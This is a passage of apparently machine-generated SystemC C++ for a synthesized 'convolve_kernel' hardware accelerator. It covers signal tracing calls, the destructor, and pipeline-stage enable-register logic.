sc_trace(mVcdFile, ap_reg_pp0_iter10_tmp_8_14_reg_3684, "ap_reg_pp0_iter10_tmp_8_14_reg_3684"); sc_trace(mVcdFile, ap_reg_pp0_iter11_tmp_8_14_reg_3684, "ap_reg_pp0_iter11_tmp_8_14_reg_3684"); sc_trace(mVcdFile, ap_reg_pp0_iter12_tmp_8_14_reg_3684, "ap_reg_pp0_iter12_tmp_8_14_reg_3684"); sc_trace(mVcdFile, ap_reg_pp0_iter13_tmp_8_14_reg_3684, "ap_reg_pp0_iter13_tmp_8_14_reg_3684"); sc_trace(mVcdFile, ap_reg_pp0_iter14_tmp_8_14_reg_3684, "ap_reg_pp0_iter14_tmp_8_14_reg_3684"); sc_trace(mVcdFile, tmp_10_1_reg_3689, "tmp_10_1_reg_3689"); sc_trace(mVcdFile, ap_enable_reg_pp0_iter3, "ap_enable_reg_pp0_iter3"); sc_trace(mVcdFile, tmp_10_2_reg_3694, "tmp_10_2_reg_3694"); sc_trace(mVcdFile, tmp_10_3_reg_3699, "tmp_10_3_reg_3699"); sc_trace(mVcdFile, ap_enable_reg_pp0_iter4, "ap_enable_reg_pp0_iter4"); sc_trace(mVcdFile, tmp_10_4_reg_3704, "tmp_10_4_reg_3704"); sc_trace(mVcdFile, ap_enable_reg_pp0_iter5, "ap_enable_reg_pp0_iter5"); sc_trace(mVcdFile, tmp_10_5_reg_3709, "tmp_10_5_reg_3709"); sc_trace(mVcdFile, ap_enable_reg_pp0_iter6, "ap_enable_reg_pp0_iter6"); sc_trace(mVcdFile, tmp_10_7_reg_3714, "tmp_10_7_reg_3714"); sc_trace(mVcdFile, ap_enable_reg_pp0_iter8, "ap_enable_reg_pp0_iter8"); sc_trace(mVcdFile, tmp_10_8_reg_3719, "tmp_10_8_reg_3719"); sc_trace(mVcdFile, ap_enable_reg_pp0_iter9, "ap_enable_reg_pp0_iter9"); sc_trace(mVcdFile, tmp_10_9_reg_3724, "tmp_10_9_reg_3724"); sc_trace(mVcdFile, ap_enable_reg_pp0_iter10, "ap_enable_reg_pp0_iter10"); sc_trace(mVcdFile, tmp_10_s_reg_3729, "tmp_10_s_reg_3729"); sc_trace(mVcdFile, tmp_10_10_reg_3734, "tmp_10_10_reg_3734"); sc_trace(mVcdFile, ap_enable_reg_pp0_iter11, "ap_enable_reg_pp0_iter11"); sc_trace(mVcdFile, tmp_10_11_reg_3739, "tmp_10_11_reg_3739"); sc_trace(mVcdFile, ap_enable_reg_pp0_iter12, "ap_enable_reg_pp0_iter12"); sc_trace(mVcdFile, tmp_10_12_reg_3744, "tmp_10_12_reg_3744"); sc_trace(mVcdFile, ap_enable_reg_pp0_iter13, "ap_enable_reg_pp0_iter13"); sc_trace(mVcdFile, tmp_10_13_reg_3749, "tmp_10_13_reg_3749"); sc_trace(mVcdFile, ap_enable_reg_pp0_iter14, "ap_enable_reg_pp0_iter14"); sc_trace(mVcdFile, ap_block_pp0_stage0_flag00011011, "ap_block_pp0_stage0_flag00011011"); sc_trace(mVcdFile, ap_condition_pp0_exit_iter0_state2, "ap_condition_pp0_exit_iter0_state2"); sc_trace(mVcdFile, ap_block_pp0_stage15_flag00011011, "ap_block_pp0_stage15_flag00011011"); sc_trace(mVcdFile, ap_block_pp0_stage6_flag00011011, "ap_block_pp0_stage6_flag00011011"); sc_trace(mVcdFile, indvar_flatten1_phi_fu_465_p4, "indvar_flatten1_phi_fu_465_p4"); sc_trace(mVcdFile, ap_block_pp0_stage0_flag00000000, "ap_block_pp0_stage0_flag00000000"); sc_trace(mVcdFile, i_phi_fu_476_p4, "i_phi_fu_476_p4"); sc_trace(mVcdFile, indvar_flatten2_phi_fu_488_p4, "indvar_flatten2_phi_fu_488_p4"); sc_trace(mVcdFile, j_phi_fu_499_p4, "j_phi_fu_499_p4"); sc_trace(mVcdFile, indvar_flatten3_phi_fu_511_p4, "indvar_flatten3_phi_fu_511_p4"); sc_trace(mVcdFile, row_b_phi_fu_523_p4, "row_b_phi_fu_523_p4"); sc_trace(mVcdFile, indvar_flatten_phi_fu_535_p4, "indvar_flatten_phi_fu_535_p4"); sc_trace(mVcdFile, ap_block_pp0_stage1_flag00000000, "ap_block_pp0_stage1_flag00000000"); sc_trace(mVcdFile, col_b_phi_fu_547_p4, "col_b_phi_fu_547_p4"); sc_trace(mVcdFile, to_b_phi_fu_559_p4, "to_b_phi_fu_559_p4"); sc_trace(mVcdFile, ap_block_pp0_stage2_flag00000000, "ap_block_pp0_stage2_flag00000000"); sc_trace(mVcdFile, tmp_174_cast_fu_1241_p1, "tmp_174_cast_fu_1241_p1"); sc_trace(mVcdFile, ap_block_pp0_stage8_flag00000000, "ap_block_pp0_stage8_flag00000000"); sc_trace(mVcdFile, tmp_62_cast_fu_1259_p1, "tmp_62_cast_fu_1259_p1"); sc_trace(mVcdFile, ap_block_pp0_stage9_flag00000000, "ap_block_pp0_stage9_flag00000000"); sc_trace(mVcdFile, tmp_35_cast_fu_1321_p1, "tmp_35_cast_fu_1321_p1"); sc_trace(mVcdFile, ap_block_pp0_stage10_flag00000000, "ap_block_pp0_stage10_flag00000000"); sc_trace(mVcdFile, tmp_36_cast_fu_1379_p1, "tmp_36_cast_fu_1379_p1"); sc_trace(mVcdFile, ap_block_pp0_stage11_flag00000000, "ap_block_pp0_stage11_flag00000000"); sc_trace(mVcdFile, tmp_121_cast_fu_1440_p1, "tmp_121_cast_fu_1440_p1"); sc_trace(mVcdFile, tmp_37_cast_fu_1449_p1, "tmp_37_cast_fu_1449_p1"); sc_trace(mVcdFile, ap_block_pp0_stage12_flag00000000, "ap_block_pp0_stage12_flag00000000"); sc_trace(mVcdFile, tmp_38_cast_fu_1693_p1, "tmp_38_cast_fu_1693_p1"); sc_trace(mVcdFile, ap_block_pp0_stage13_flag00000000, "ap_block_pp0_stage13_flag00000000"); sc_trace(mVcdFile, tmp_69_cast_fu_1701_p1, "tmp_69_cast_fu_1701_p1"); sc_trace(mVcdFile, tmp_39_cast_fu_1738_p1, "tmp_39_cast_fu_1738_p1"); sc_trace(mVcdFile, ap_block_pp0_stage14_flag00000000, "ap_block_pp0_stage14_flag00000000"); sc_trace(mVcdFile, tmp_76_cast_fu_1746_p1, "tmp_76_cast_fu_1746_p1"); sc_trace(mVcdFile, tmp_40_cast_fu_1783_p1, "tmp_40_cast_fu_1783_p1"); sc_trace(mVcdFile, ap_block_pp0_stage15_flag00000000, "ap_block_pp0_stage15_flag00000000"); sc_trace(mVcdFile, tmp_83_cast_fu_1791_p1, "tmp_83_cast_fu_1791_p1"); sc_trace(mVcdFile, tmp_41_cast_fu_1852_p1, "tmp_41_cast_fu_1852_p1"); sc_trace(mVcdFile, tmp_90_cast_fu_1860_p1, "tmp_90_cast_fu_1860_p1"); sc_trace(mVcdFile, tmp_42_cast_fu_1893_p1, "tmp_42_cast_fu_1893_p1"); sc_trace(mVcdFile, tmp_97_cast_fu_1901_p1, "tmp_97_cast_fu_1901_p1"); sc_trace(mVcdFile, tmp_43_cast_fu_1982_p1, "tmp_43_cast_fu_1982_p1"); sc_trace(mVcdFile, tmp_104_cast_fu_1990_p1, "tmp_104_cast_fu_1990_p1"); sc_trace(mVcdFile, tmp_44_cast_fu_2087_p1, "tmp_44_cast_fu_2087_p1"); sc_trace(mVcdFile, ap_block_pp0_stage3_flag00000000, "ap_block_pp0_stage3_flag00000000"); sc_trace(mVcdFile, tmp_111_cast_fu_2095_p1, "tmp_111_cast_fu_2095_p1"); sc_trace(mVcdFile, tmp_45_cast_fu_2132_p1, "tmp_45_cast_fu_2132_p1"); sc_trace(mVcdFile, ap_block_pp0_stage4_flag00000000, "ap_block_pp0_stage4_flag00000000"); sc_trace(mVcdFile, tmp_128_cast_fu_2140_p1, "tmp_128_cast_fu_2140_p1"); sc_trace(mVcdFile, tmp_46_cast_fu_2149_p1, "tmp_46_cast_fu_2149_p1"); sc_trace(mVcdFile, ap_block_pp0_stage5_flag00000000, "ap_block_pp0_stage5_flag00000000"); sc_trace(mVcdFile, tmp_135_cast_fu_2157_p1, "tmp_135_cast_fu_2157_p1"); sc_trace(mVcdFile, tmp_47_cast_fu_2171_p1, "tmp_47_cast_fu_2171_p1"); sc_trace(mVcdFile, ap_block_pp0_stage6_flag00000000, "ap_block_pp0_stage6_flag00000000"); sc_trace(mVcdFile, tmp_142_cast_fu_2179_p1, "tmp_142_cast_fu_2179_p1"); sc_trace(mVcdFile, tmp_48_cast_fu_2183_p1, "tmp_48_cast_fu_2183_p1"); sc_trace(mVcdFile, ap_block_pp0_stage7_flag00000000, "ap_block_pp0_stage7_flag00000000"); sc_trace(mVcdFile, tmp_149_cast_fu_2195_p1, "tmp_149_cast_fu_2195_p1"); sc_trace(mVcdFile, tmp_49_cast_fu_2199_p1, "tmp_49_cast_fu_2199_p1"); sc_trace(mVcdFile, tmp_156_cast_fu_2203_p1, "tmp_156_cast_fu_2203_p1"); sc_trace(mVcdFile, tmp_50_cast_fu_2207_p1, "tmp_50_cast_fu_2207_p1"); sc_trace(mVcdFile, tmp_163_cast_fu_2211_p1, "tmp_163_cast_fu_2211_p1"); sc_trace(mVcdFile, tmp_170_cast_fu_2215_p1, "tmp_170_cast_fu_2215_p1"); sc_trace(mVcdFile, bufw_Addr_A_orig, "bufw_Addr_A_orig"); sc_trace(mVcdFile, bufo_Addr_A_orig, "bufo_Addr_A_orig"); sc_trace(mVcdFile, bufi_Addr_A_orig, "bufi_Addr_A_orig"); sc_trace(mVcdFile, grp_fu_567_p0, "grp_fu_567_p0"); sc_trace(mVcdFile, grp_fu_567_p1, "grp_fu_567_p1"); sc_trace(mVcdFile, grp_fu_571_p0, "grp_fu_571_p0"); sc_trace(mVcdFile, grp_fu_571_p1, "grp_fu_571_p1"); sc_trace(mVcdFile, tmp_fu_589_p2, "tmp_fu_589_p2"); sc_trace(mVcdFile, i_cast7_fu_581_p1, "i_cast7_fu_581_p1"); sc_trace(mVcdFile, tmp_5_cast_fu_595_p1, "tmp_5_cast_fu_595_p1"); sc_trace(mVcdFile, tmp_1_fu_605_p2, "tmp_1_fu_605_p2"); sc_trace(mVcdFile, j_cast5_fu_585_p1, "j_cast5_fu_585_p1"); sc_trace(mVcdFile, tmp_9_cast_fu_611_p1, "tmp_9_cast_fu_611_p1"); sc_trace(mVcdFile, exitcond_flatten43_n_fu_662_p2, "exitcond_flatten43_n_fu_662_p2"); sc_trace(mVcdFile, exitcond_flatten_mid_fu_684_p2, "exitcond_flatten_mid_fu_684_p2"); sc_trace(mVcdFile, tmp_2_mid_fu_704_p2, "tmp_2_mid_fu_704_p2"); sc_trace(mVcdFile, tmp_5_fu_717_p2, "tmp_5_fu_717_p2"); sc_trace(mVcdFile, tmp_2_mid1_fu_712_p2, "tmp_2_mid1_fu_712_p2"); sc_trace(mVcdFile, not_exitcond_flatten_2_fu_726_p2, "not_exitcond_flatten_2_fu_726_p2"); sc_trace(mVcdFile, tmp_29_fu_774_p2, "tmp_29_fu_774_p2"); sc_trace(mVcdFile, tmp_30_fu_778_p2, "tmp_30_fu_778_p2"); sc_trace(mVcdFile, tmp_49_fu_835_p3, "tmp_49_fu_835_p3"); sc_trace(mVcdFile, tmp_52_cast_fu_831_p1, "tmp_52_cast_fu_831_p1"); sc_trace(mVcdFile, p_shl3_cast_fu_842_p1, "p_shl3_cast_fu_842_p1"); sc_trace(mVcdFile, tmp_50_fu_846_p2, "tmp_50_fu_846_p2"); sc_trace(mVcdFile, tmp_57_fu_866_p2, "tmp_57_fu_866_p2"); sc_trace(mVcdFile, grp_fu_890_p0, "grp_fu_890_p0"); sc_trace(mVcdFile, grp_fu_890_p1, "grp_fu_890_p1"); sc_trace(mVcdFile, tmp_112_fu_896_p2, "tmp_112_fu_896_p2"); sc_trace(mVcdFile, grp_fu_920_p0, "grp_fu_920_p0"); sc_trace(mVcdFile, grp_fu_920_p1, "grp_fu_920_p1"); sc_trace(mVcdFile, tmp_6_cast_mid_cast_fu_934_p1, "tmp_6_cast_mid_cast_fu_934_p1"); sc_trace(mVcdFile, i_cast7_mid2_cast_fu_931_p1, "i_cast7_mid2_cast_fu_931_p1"); sc_trace(mVcdFile, tmp_6_cast_mid3_fu_937_p3, "tmp_6_cast_mid3_fu_937_p3"); sc_trace(mVcdFile, j_cast4_mid1_cast_fu_952_p1, "j_cast4_mid1_cast_fu_952_p1"); sc_trace(mVcdFile, tmp_cast_mid_fu_943_p3, "tmp_cast_mid_fu_943_p3"); sc_trace(mVcdFile, tmp_9_fu_974_p2, "tmp_9_fu_974_p2"); sc_trace(mVcdFile, tmp_5_cast_mid1_fu_979_p1, "tmp_5_cast_mid1_fu_979_p1"); sc_trace(mVcdFile, j_cast5_mid2_cast_fu_949_p1, "j_cast5_mid2_cast_fu_949_p1"); sc_trace(mVcdFile, tmp_cast_mid3_fu_962_p3, "tmp_cast_mid3_fu_962_p3"); sc_trace(mVcdFile, tmp_31_fu_1001_p2, "tmp_31_fu_1001_p2"); sc_trace(mVcdFile, tmp_9_cast_mid1_fu_1006_p1, "tmp_9_cast_mid1_fu_1006_p1"); sc_trace(mVcdFile, tmp_65_fu_1020_p2, "tmp_65_fu_1020_p2"); sc_trace(mVcdFile, grp_fu_1043_p0, "grp_fu_1043_p0"); sc_trace(mVcdFile, grp_fu_1043_p1, "grp_fu_1043_p1"); sc_trace(mVcdFile, tmp_54_fu_1065_p3, "tmp_54_fu_1065_p3"); sc_trace(mVcdFile, tmp_59_cast_fu_1071_p1, "tmp_59_cast_fu_1071_p1"); sc_trace(mVcdFile, p_shl34_cast_fu_1075_p4, "p_shl34_cast_fu_1075_p4"); sc_trace(mVcdFile, tmp_73_fu_1089_p2, "tmp_73_fu_1089_p2"); sc_trace(mVcdFile, grp_fu_1112_p0, "grp_fu_1112_p0"); sc_trace(mVcdFile, grp_fu_1112_p1, "grp_fu_1112_p1"); sc_trace(mVcdFile, grp_fu_920_p2, "grp_fu_920_p2"); sc_trace(mVcdFile, tmp_52_cast1_fu_1062_p1, "tmp_52_cast1_fu_1062_p1"); sc_trace(mVcdFile, row_b_cast3_mid2_cas_fu_1049_p1, "row_b_cast3_mid2_cas_fu_1049_p1"); sc_trace(mVcdFile, tmp_11_fu_1154_p3, "tmp_11_fu_1154_p3"); sc_trace(mVcdFile, tmp_12_fu_1165_p3, "tmp_12_fu_1165_p3"); sc_trace(mVcdFile, p_shl2_cast_fu_1172_p1, "p_shl2_cast_fu_1172_p1"); sc_trace(mVcdFile, p_shl1_cast_fu_1161_p1, "p_shl1_cast_fu_1161_p1"); sc_trace(mVcdFile, grp_fu_1190_p1, "grp_fu_1190_p1"); sc_trace(mVcdFile, tmp_81_fu_1195_p2, "tmp_81_fu_1195_p2"); sc_trace(mVcdFile, grp_fu_1218_p0, "grp_fu_1218_p0"); sc_trace(mVcdFile, grp_fu_1218_p1, "grp_fu_1218_p1"); sc_trace(mVcdFile, tmp_173_cast_fu_1228_p3, "tmp_173_cast_fu_1228_p3"); sc_trace(mVcdFile, col_b_cast2_mid2_cas_fu_1182_p1, "col_b_cast2_mid2_cas_fu_1182_p1"); sc_trace(mVcdFile, tmp_174_fu_1235_p2, "tmp_174_fu_1235_p2"); sc_trace(mVcdFile, tmp_89_fu_1267_p2, "tmp_89_fu_1267_p2"); sc_trace(mVcdFile, grp_fu_1290_p0, "grp_fu_1290_p0"); sc_trace(mVcdFile, grp_fu_1290_p1, "grp_fu_1290_p1"); sc_trace(mVcdFile, tmp_118_cast_fu_1296_p3, "tmp_118_cast_fu_1296_p3"); sc_trace(mVcdFile, p_shl18_cast_fu_1302_p4, "p_shl18_cast_fu_1302_p4"); sc_trace(mVcdFile, grp_fu_1190_p2, "grp_fu_1190_p2"); sc_trace(mVcdFile, tmp_97_fu_1341_p2, "tmp_97_fu_1341_p2"); sc_trace(mVcdFile, grp_fu_1364_p0, "grp_fu_1364_p0"); sc_trace(mVcdFile, grp_fu_1364_p1, "grp_fu_1364_p1"); sc_trace(mVcdFile, p_shl32_cast_fu_1387_p3, "p_shl32_cast_fu_1387_p3"); sc_trace(mVcdFile, grp_fu_1263_p2, "grp_fu_1263_p2"); sc_trace(mVcdFile, tmp_105_fu_1411_p2, "tmp_105_fu_1411_p2"); sc_trace(mVcdFile, grp_fu_1434_p0, "grp_fu_1434_p0"); sc_trace(mVcdFile, grp_fu_1434_p1, "grp_fu_1434_p1"); sc_trace(mVcdFile, p_shl30_cast_fu_1461_p3, "p_shl30_cast_fu_1461_p3"); sc_trace(mVcdFile, grp_fu_1337_p2, "grp_fu_1337_p2"); sc_trace(mVcdFile, tmp_122_fu_1485_p2, "tmp_122_fu_1485_p2"); sc_trace(mVcdFile, grp_fu_1508_p0, "grp_fu_1508_p0"); sc_trace(mVcdFile, grp_fu_1508_p1, "grp_fu_1508_p1"); sc_trace(mVcdFile, tmp_129_fu_1514_p2, "tmp_129_fu_1514_p2"); sc_trace(mVcdFile, grp_fu_1537_p0, "grp_fu_1537_p0"); sc_trace(mVcdFile, grp_fu_1537_p1, "grp_fu_1537_p1"); sc_trace(mVcdFile, tmp_136_fu_1543_p2, "tmp_136_fu_1543_p2"); sc_trace(mVcdFile, grp_fu_1566_p0, "grp_fu_1566_p0"); sc_trace(mVcdFile, grp_fu_1566_p1, "grp_fu_1566_p1"); sc_trace(mVcdFile, tmp_143_fu_1572_p2, "tmp_143_fu_1572_p2"); sc_trace(mVcdFile, grp_fu_1595_p0, "grp_fu_1595_p0"); sc_trace(mVcdFile, grp_fu_1595_p1, "grp_fu_1595_p1"); sc_trace(mVcdFile, tmp_150_fu_1601_p2, "tmp_150_fu_1601_p2"); sc_trace(mVcdFile, grp_fu_1624_p0, "grp_fu_1624_p0"); sc_trace(mVcdFile, grp_fu_1624_p1, "grp_fu_1624_p1"); sc_trace(mVcdFile, tmp_157_fu_1630_p2, "tmp_157_fu_1630_p2"); sc_trace(mVcdFile, grp_fu_1653_p0, "grp_fu_1653_p0"); sc_trace(mVcdFile, grp_fu_1653_p1, "grp_fu_1653_p1"); sc_trace(mVcdFile, tmp_164_fu_1659_p2, "tmp_164_fu_1659_p2"); sc_trace(mVcdFile, grp_fu_1682_p0, "grp_fu_1682_p0"); sc_trace(mVcdFile, grp_fu_1682_p1, "grp_fu_1682_p1"); sc_trace(mVcdFile, p_shl28_cast_fu_1709_p3, "p_shl28_cast_fu_1709_p3"); sc_trace(mVcdFile, grp_fu_1407_p2, "grp_fu_1407_p2"); sc_trace(mVcdFile, p_shl26_cast_fu_1754_p3, "p_shl26_cast_fu_1754_p3"); sc_trace(mVcdFile, grp_fu_1481_p2, "grp_fu_1481_p2"); sc_trace(mVcdFile, p_shl24_cast_fu_1799_p3, "p_shl24_cast_fu_1799_p3"); sc_trace(mVcdFile, grp_fu_1729_p2, "grp_fu_1729_p2"); sc_trace(mVcdFile, p_shl22_cast_fu_1868_p3, "p_shl22_cast_fu_1868_p3"); sc_trace(mVcdFile, grp_fu_1774_p2, "grp_fu_1774_p2"); sc_trace(mVcdFile, p_shl20_cast_fu_1909_p3, "p_shl20_cast_fu_1909_p3"); sc_trace(mVcdFile, grp_fu_1819_p2, "grp_fu_1819_p2"); sc_trace(mVcdFile, grp_fu_1823_p2, "grp_fu_1823_p2"); sc_trace(mVcdFile, grp_fu_1827_p2, "grp_fu_1827_p2"); sc_trace(mVcdFile, grp_fu_1831_p2, "grp_fu_1831_p2"); sc_trace(mVcdFile, grp_fu_1835_p2, "grp_fu_1835_p2"); sc_trace(mVcdFile, grp_fu_1839_p2, "grp_fu_1839_p2"); sc_trace(mVcdFile, grp_fu_1843_p2, "grp_fu_1843_p2"); sc_trace(mVcdFile, p_shl16_cast_fu_1998_p3, "p_shl16_cast_fu_1998_p3"); sc_trace(mVcdFile, p_shl14_cast_fu_2010_p3, "p_shl14_cast_fu_2010_p3"); sc_trace(mVcdFile, p_shl12_cast_fu_2022_p3, "p_shl12_cast_fu_2022_p3"); sc_trace(mVcdFile, p_shl10_cast_fu_2034_p3, "p_shl10_cast_fu_2034_p3"); sc_trace(mVcdFile, p_shl8_cast_fu_2046_p3, "p_shl8_cast_fu_2046_p3"); sc_trace(mVcdFile, p_shl6_cast_fu_2058_p3, "p_shl6_cast_fu_2058_p3"); sc_trace(mVcdFile, p_shl_cast_fu_2070_p3, "p_shl_cast_fu_2070_p3"); sc_trace(mVcdFile, ap_CS_fsm_state249, "ap_CS_fsm_state249"); sc_trace(mVcdFile, ap_NS_fsm, "ap_NS_fsm"); sc_trace(mVcdFile, ap_block_pp0_stage1_flag00011011, "ap_block_pp0_stage1_flag00011011"); sc_trace(mVcdFile, ap_block_pp0_stage2_flag00011011, "ap_block_pp0_stage2_flag00011011"); sc_trace(mVcdFile, ap_block_pp0_stage3_flag00011011, "ap_block_pp0_stage3_flag00011011"); sc_trace(mVcdFile, ap_block_pp0_stage4_flag00011011, "ap_block_pp0_stage4_flag00011011"); sc_trace(mVcdFile, ap_block_pp0_stage5_flag00011011, "ap_block_pp0_stage5_flag00011011"); sc_trace(mVcdFile, ap_block_pp0_stage7_flag00011011, "ap_block_pp0_stage7_flag00011011"); sc_trace(mVcdFile, ap_block_pp0_stage8_flag00011011, "ap_block_pp0_stage8_flag00011011"); sc_trace(mVcdFile, ap_block_pp0_stage9_flag00011011, "ap_block_pp0_stage9_flag00011011"); sc_trace(mVcdFile, ap_block_pp0_stage10_flag00011011, "ap_block_pp0_stage10_flag00011011"); sc_trace(mVcdFile, ap_block_pp0_stage11_flag00011011, "ap_block_pp0_stage11_flag00011011"); sc_trace(mVcdFile, ap_block_pp0_stage12_flag00011011, "ap_block_pp0_stage12_flag00011011"); sc_trace(mVcdFile, ap_block_pp0_stage13_flag00011011, "ap_block_pp0_stage13_flag00011011"); sc_trace(mVcdFile, ap_block_pp0_stage14_flag00011011, "ap_block_pp0_stage14_flag00011011"); sc_trace(mVcdFile, ap_idle_pp0, "ap_idle_pp0"); sc_trace(mVcdFile, ap_enable_pp0, "ap_enable_pp0"); #endif } mHdltvinHandle.open("convolve_kernel.hdltvin.dat"); mHdltvoutHandle.open("convolve_kernel.hdltvout.dat"); } convolve_kernel::~convolve_kernel() { if (mVcdFile) sc_close_vcd_trace_file(mVcdFile); mHdltvinHandle << "] " << endl; mHdltvoutHandle << "] " << endl; mHdltvinHandle.close(); mHdltvoutHandle.close(); delete convolve_kernel_control_s_axi_U; delete convolve_kernel_fbkb_U1; delete convolve_kernel_fcud_U2; delete convolve_kernel_adEe_U3; delete convolve_kernel_adEe_U4; delete convolve_kernel_adEe_U5; delete convolve_kernel_adEe_U6; delete convolve_kernel_adEe_U7; delete convolve_kernel_adEe_U8; delete convolve_kernel_adEe_U9; delete convolve_kernel_adEe_U10; delete convolve_kernel_adEe_U11; delete convolve_kernel_adEe_U12; delete convolve_kernel_adEe_U13; delete convolve_kernel_adEe_U14; delete convolve_kernel_adEe_U15; delete convolve_kernel_adEe_U16; delete convolve_kernel_adEe_U17; delete convolve_kernel_adEe_U18; delete convolve_kernel_adEe_U19; delete convolve_kernel_adEe_U20; delete convolve_kernel_adEe_U21; delete convolve_kernel_adEe_U22; delete convolve_kernel_adEe_U23; delete convolve_kernel_adEe_U24; delete convolve_kernel_adEe_U25; delete convolve_kernel_adEe_U26; delete convolve_kernel_adEe_U27; delete convolve_kernel_adEe_U28; delete convolve_kernel_adEe_U29; delete convolve_kernel_adEe_U30; delete convolve_kernel_adEe_U31; } void convolve_kernel::thread_ap_var_for_const0() { ap_var_for_const0 = ap_const_logic_1; } void convolve_kernel::thread_ap_clk_no_reset_() { if ( ap_rst_n_inv.read() == ap_const_logic_1) { ap_CS_fsm = ap_ST_fsm_state1; } else { ap_CS_fsm = ap_NS_fsm.read(); } if ( ap_rst_n_inv.read() == ap_const_logic_1) { ap_enable_reg_pp0_iter0 = ap_const_logic_0; } else { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00011011.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_condition_pp0_exit_iter0_state2.read()))) { ap_enable_reg_pp0_iter0 = ap_const_logic_0; } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_state1.read()) && esl_seteq<1,1,1>(ap_start.read(), ap_const_logic_1))) { ap_enable_reg_pp0_iter0 = ap_const_logic_1; } } if ( ap_rst_n_inv.read() == ap_const_logic_1) { ap_enable_reg_pp0_iter1 = ap_const_logic_0; } else { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011011.read(), ap_const_boolean_0))) { if (esl_seteq<1,1,1>(ap_const_logic_1, ap_condition_pp0_exit_iter0_state2.read())) { ap_enable_reg_pp0_iter1 = (ap_condition_pp0_exit_iter0_state2.read() ^ ap_const_logic_1); } else if (esl_seteq<1,1,1>(ap_const_boolean_1, ap_const_boolean_1)) { ap_enable_reg_pp0_iter1 = ap_enable_reg_pp0_iter0.read(); } } } if ( ap_rst_n_inv.read() == ap_const_logic_1) { ap_enable_reg_pp0_iter10 = ap_const_logic_0; } else { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011011.read(), ap_const_boolean_0))) { ap_enable_reg_pp0_iter10 = ap_enable_reg_pp0_iter9.read(); } } if ( ap_rst_n_inv.read() == ap_const_logic_1) { ap_enable_reg_pp0_iter11 = ap_const_logic_0; } else { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011011.read(), ap_const_boolean_0))) { ap_enable_reg_pp0_iter11 = ap_enable_reg_pp0_iter10.read(); } } if ( ap_rst_n_inv.read() == ap_const_logic_1) { ap_enable_reg_pp0_iter12 = ap_const_logic_0; } else { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011011.read(), ap_const_boolean_0))) { ap_enable_reg_pp0_iter12 = ap_enable_reg_pp0_iter11.read(); } } if ( ap_rst_n_inv.read() == ap_const_logic_1) { ap_enable_reg_pp0_iter13 = ap_const_logic_0; } else { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011011.read(), ap_const_boolean_0))) { ap_enable_reg_pp0_iter13 = ap_enable_reg_pp0_iter12.read(); } } if ( ap_rst_n_inv.read() == ap_const_logic_1) { ap_enable_reg_pp0_iter14 = ap_const_logic_0; } else { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011011.read(), ap_const_boolean_0))) { ap_enable_reg_pp0_iter14 = ap_enable_reg_pp0_iter13.read(); } } if ( ap_rst_n_inv.read() == ap_const_logic_1) { ap_enable_reg_pp0_iter15 = ap_const_logic_0; } else { if (((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011011.read(), ap_const_boolean_0)) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00011011.read(), ap_const_boolean_0)))) { ap_enable_reg_pp0_iter15 = ap_enable_reg_pp0_iter14.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_state1.read()) && esl_seteq<1,1,1>(ap_start.read(), ap_const_logic_1))) { ap_enable_reg_pp0_iter15 = ap_const_logic_0; } } if ( ap_rst_n_inv.read() == ap_const_logic_1) { ap_enable_reg_pp0_iter2 = ap_const_logic_0; } else { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011011.read(), ap_const_boolean_0))) { ap_enable_reg_pp0_iter2 = ap_enable_reg_pp0_iter1.read(); } } if ( ap_rst_n_inv.read() == ap_const_logic_1) { ap_enable_reg_pp0_iter3 = ap_const_logic_0; } else { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011011.read(), ap_const_boolean_0))) { ap_enable_reg_pp0_iter3 = ap_enable_reg_pp0_iter2.read(); } } if ( ap_rst_n_inv.read() == ap_const_logic_1) { ap_enable_reg_pp0_iter4 = ap_const_logic_0; } else { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011011.read(), ap_const_boolean_0))) { ap_enable_reg_pp0_iter4 = ap_enable_reg_pp0_iter3.read(); } } if ( ap_rst_n_inv.read() == ap_const_logic_1) { ap_enable_reg_pp0_iter5 = ap_const_logic_0; } else { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011011.read(), ap_const_boolean_0))) { ap_enable_reg_pp0_iter5 = ap_enable_reg_pp0_iter4.read(); } } if ( ap_rst_n_inv.read() == ap_const_logic_1) { ap_enable_reg_pp0_iter6 = ap_const_logic_0; } else { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011011.read(), ap_const_boolean_0))) { ap_enable_reg_pp0_iter6 = ap_enable_reg_pp0_iter5.read(); } } if ( 